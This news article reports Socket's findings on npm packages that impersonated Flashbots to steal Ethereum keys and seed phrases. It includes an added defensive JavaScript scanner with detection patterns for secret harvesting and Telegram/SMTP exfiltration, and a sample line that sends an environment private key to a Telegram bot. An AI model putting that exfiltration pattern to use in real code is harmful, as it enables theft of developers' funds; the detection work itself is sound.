A new wave of malicious npm packages has been uncovered, targeting Ethereum developers by disguising themselves as legitimate Flashbots tools. According to security firm Socket, these malicious npm packages were designed to exfiltrate private keys and mnemonic seed phrases, sending them directly to a Telegram bot controlled by the attackers.
The threat actors, operating under the username “flashbotts,” uploaded four malicious npm packages between September 2023 and August 19, 2025. The impersonation of Flashbots — a trusted project that mitigates Maximal Extractable Value (MEV) attacks — appears calculated to exploit developer trust in widely used cryptographic utilities.
“Malicious npm packages like these demonstrate how attackers are leveraging software supply chains to bypass security checks and directly target developers,” Kush Pandya, a researcher at Socket, said in the published analysis.
How malicious npm packages impersonated Flashbots
The most dangerous of the malicious npm packages, identified as @flashbotts/ethers-provider-bundle, concealed its operations behind a functional cover that mimicked Flashbots’ API. The library covertly harvested environment variables, exfiltrated them over SMTP via Mailtrap, and redirected unsigned Ethereum transactions to attacker-controlled wallets.
Other malicious npm packages in the set, including sdk-ethers and flashbot-sdk-eth, were programmed to extract mnemonic seed phrases and private keys under certain conditions. Another package, gram-utilz, enabled attackers to exfiltrate arbitrary data to their Telegram-controlled infrastructure.
By blending harmful code with legitimate utilities, the attackers successfully obscured their intent. This technique makes detection challenging for developers relying on npm’s vast ecosystem of open-source packages.
“By exploiting the Flashbots name, the attackers increased the likelihood of unsuspecting developers integrating malicious npm packages into their trading bots or wallet infrastructure,” Pandya added.
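As an added example, not code from Socket's report or from Flashbots, the following JavaScript shows a defender's heuristic for the pattern described above: it flags package source only when a secret source (environment variables, mnemonics, private keys) co-occurs with an exfiltration sink (Telegram Bot API, SMTP/Mailtrap), and separately flags a package scope that sits one or two edits away from a trusted scope. It assumes @flashbots is the legitimate scope being imitated, and the sample source string is constructed for the demonstration.

```javascript
// Added example (not from Socket's report or Flashbots): heuristic scan of
// package source for secret harvesting paired with an exfiltration channel,
// plus a look-alike check on scoped package names.
const SECRET_PATTERNS = [/process\.env\b/, /\bmnemonic\b/i, /private_?key/i];
const EXFIL_PATTERNS = [/api\.telegram\.org\/bot/i, /\bnodemailer\b/, /mailtrap/i, /\bsmtp\b/i];

// Scopes a team expects to depend on; a scope one or two edits away is a flag.
// "@flashbots" is assumed here to be the trusted scope the attackers imitated.
const TRUSTED_SCOPES = ["@flashbots"];

// Levenshtein distance, used to catch scope look-alikes such as "@flashbotts".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
    }
  }
  return d[a.length][b.length];
}

// Returns the trusted scope a package name imitates, or null when the scope is
// either exactly trusted or not close to any trusted scope.
function lookalikeScope(pkgName) {
  if (!pkgName.startsWith("@")) return null;
  const scope = pkgName.split("/")[0].toLowerCase();
  for (const trusted of TRUSTED_SCOPES) {
    const dist = editDistance(scope, trusted);
    if (dist > 0 && dist <= 2) return trusted;
  }
  return null;
}

// Flags source only when a secret source and an exfil sink co-occur; either
// alone is common in legitimate code and would drown reviewers in noise.
function scanSource(src) {
  const secrets = SECRET_PATTERNS.filter((re) => re.test(src)).map((re) => re.source);
  const sinks = EXFIL_PATTERNS.filter((re) => re.test(src)).map((re) => re.source);
  return { secrets, sinks, suspicious: secrets.length > 0 && sinks.length > 0 };
}

// Constructed sample mimicking the described behaviour; not the real payload.
const SAMPLE = `const key = process.env.PRIVATE_KEY;
fetch("https://api.telegram.org/bot<TOKEN>/sendMessage?text=" + key);`;

console.log(lookalikeScope("@flashbotts/ethers-provider-bundle"), scanSource(SAMPLE));
```

Run it against each directory under node_modules before a release build; a hit is a prompt for manual review, not proof of malice.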
Why malicious npm packages pose a serious threat
Mnemonic seed phrases, often referred to as the “master keys” to crypto wallets, allow full access and recovery of funds. Once stolen through the npm packages, these phrases give attackers complete and irreversible control over a victim’s assets.
The attack highlights the growing risk of software supply chain vulnerabilities. Developers integrating malicious npm packages into decentralized finance (DeFi) tools or validator infrastructure could unintentionally expose sensitive wallet information, leading to immediate losses.
“Compromised private keys in a high-frequency trading environment can lead to catastrophic financial consequences within seconds,” Michael Driscoll, a blockchain security analyst at SecureChain Labs, told The Block.
Investigators also found Vietnamese language comments in the source code, suggesting that the attackers may be Vietnamese-speaking and financially motivated.
Industry response to malicious npm packages
The discovery of the npm packages underscores the urgent need for stronger safeguards in the open-source ecosystem. Security experts argue that greater emphasis should be placed on code auditing, package verification, and developer education.
“Malicious npm packages weaponize developer trust in familiar names, turning what should be routine development tasks into high-stakes security risks,” Driscoll added.
Flashbots, while not directly implicated, is working with the broader Ethereum community to emphasize safe integration practices and to remind developers to verify package authenticity before adoption.
The findings serve as a reminder that malicious npm packages remain one of the most effective tools for attackers conducting software supply chain attacks. With Web3 development increasingly reliant on shared codebases, industry stakeholders warn that the risks will continue to grow without proactive defenses.